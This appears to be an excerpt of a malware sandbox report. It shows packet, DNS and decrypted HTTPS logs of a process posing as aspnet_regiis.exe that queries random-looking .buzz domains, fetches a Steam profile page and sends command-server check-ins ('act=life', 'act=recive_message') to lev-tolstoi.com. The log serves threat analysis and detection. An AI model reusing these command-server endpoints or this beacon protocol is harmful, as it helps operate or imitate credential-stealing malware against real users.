                                                                                                                                                                                                                                            Dec 27, 2024 22:38:08.763387918 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:08.763483047 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:08.763523102 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.697133064 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.697240114 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.697293997 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.697439909 CET49734443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.697458029 CET44349734104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.916023970 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.916074038 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.916150093 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.916414022 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:11.916428089 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.130877972 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.131035089 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.131947041 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.131953955 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.132189035 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.133160114 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.133256912 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.133275032 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.133322001 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:13.133328915 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.066726923 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.066814899 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.066941977 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.067012072 CET49735443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.067028999 CET44349735104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.455641985 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.455760002 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.455837965 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.456109047 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:14.456144094 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:15.715284109 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:15.715384960 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:15.716583967 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:15.716614962 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:15.716856003 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:15.718017101 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:15.718118906 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:15.718132019 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.485479116 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.485557079 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.485739946 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.485739946 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.530283928 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.530364037 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.530458927 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.530708075 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.530730963 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.797707081 CET49737443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:16.797758102 CET44349737104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.788454056 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.788573980 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.839354992 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.839413881 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.839679956 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.891339064 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.900599957 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.900676012 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:17.900686979 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.549485922 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.549621105 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.549724102 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.549889088 CET49739443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.549936056 CET44349739104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.596496105 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.596549988 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.596815109 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.597068071 CET49743443192.168.2.4104.21.66.86
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:19.597081900 CET44349743104.21.66.86192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:20.418309927 CET49743443192.168.2.4104.21.66.86

                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.269686937 CET5333053192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.486180067 CET53533301.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.489458084 CET5152153192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.626764059 CET53515211.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.631659031 CET6223853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.769398928 CET53622381.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.771704912 CET5583453192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.909754038 CET53558341.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.912681103 CET5364153192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.051012039 CET53536411.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.053174973 CET6052053192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.193907022 CET53605201.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.195772886 CET5719853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.333448887 CET53571981.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.416230917 CET6061853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.555262089 CET53606181.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.562666893 CET5887653192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.703793049 CET53588761.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.732498884 CET6262753192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.871201038 CET53626271.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.575695038 CET5337253192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.716245890 CET53533721.1.1.1192.168.2.4

                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.269686937 CET192.168.2.41.1.1.10xcbc8Standard query (0)ingreem-eilish.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.489458084 CET192.168.2.41.1.1.10xcff2Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.631659031 CET192.168.2.41.1.1.10xae86Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.771704912 CET192.168.2.41.1.1.10x5addStandard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.912681103 CET192.168.2.41.1.1.10x9f2aStandard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.053174973 CET192.168.2.41.1.1.10x52afStandard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.195772886 CET192.168.2.41.1.1.10xee36Standard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.416230917 CET192.168.2.41.1.1.10xdbe2Standard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.562666893 CET192.168.2.41.1.1.10x1ff6Standard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.732498884 CET192.168.2.41.1.1.10xf6bdStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.575695038 CET192.168.2.41.1.1.10x9bd4Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.486180067 CET1.1.1.1192.168.2.40xcbc8Name error (3)ingreem-eilish.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.626764059 CET1.1.1.1192.168.2.40xcff2Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.769398928 CET1.1.1.1192.168.2.40xae86Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:56.909754038 CET1.1.1.1192.168.2.40x5addName error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.051012039 CET1.1.1.1192.168.2.40x9f2aName error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.193907022 CET1.1.1.1192.168.2.40x52afName error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.333448887 CET1.1.1.1192.168.2.40xee36Name error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.555262089 CET1.1.1.1192.168.2.40xdbe2Name error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.703793049 CET1.1.1.1192.168.2.40x1ff6Name error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:37:57.871201038 CET1.1.1.1192.168.2.40xf6bdNo error (0)steamcommunity.com92.122.104.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.716245890 CET1.1.1.1192.168.2.40x9bd4No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Dec 27, 2024 22:38:00.716245890 CET1.1.1.1192.168.2.40x9bd4No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                                            • lev-tolstoi.com

                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.44973092.122.104.904434820C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-27 21:37:59 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                                                            2024-12-27 21:38:00 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:00 GMT
                                                                                                                                                                                                                                            Content-Length: 35121
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: sessionid=b78ff060e1e8a66ddaabd955; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            2024-12-27 21:38:00 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                            2024-12-27 21:38:00 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                            Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                            2024-12-27 21:38:00 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                            Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.449731104.21.66.864434820C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-27 21:38:01 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2024-12-27 21:38:02 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:02 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=ah3ithniaild69g8e7qesq11p6; expires=Tue, 22 Apr 2025 15:24:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Mkza%2B9mobXKyxeVMqc5sJxNreFiSACgpxZ9lDOw1UQNGFVFWcJEWlYJxPtFR8B0NLTOt%2BnbX%2BtDZDGr%2Fo6Ly03YJZC5Hq7c6a%2FcmqB5rOIbSfHmAHrOv6OFGrX8IrQzUZM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c748bd9117277-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1792&rtt_var=713&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1492842&cwnd=225&unsent_bytes=0&cid=81754b725485f40f&ts=736&x=0"
                                                                                                                                                                                                                                            2024-12-27 21:38:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                            2024-12-27 21:38:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.449732104.21.66.864434820C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-12-27 21:38:03 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2024-12-27 21:38:03 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 61 61 64 62 38 38 30 64 61 38 33 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--aadb880da83d&j=b9abc76ce53b6fc3a03566f8f764f5ea
                                                                                                                                                                                                                                            2024-12-27 21:38:04 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 21:38:04 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=4f350da1301ho42aq094k8tp6k; expires=Tue, 22 Apr 2025 15:24:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkxDkNV2oZJADFeCKDEiDs16HrA4y1ZJW1%2F6%2FKvenYHwIJlJV%2Bl2DZTt8fP7xh7Rbv%2BTnBz6zNtHhgpuxcsjGNLVohDYEFoYsigKcex3Q3rizZ8aTr3cgleCkIJ8WJQMjts%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8f8c74985c857c88-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1811&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=985&delivery_rate=1553191&cwnd=219&unsent_bytes=0&cid=282138710cd702a8&ts=779&x=0"
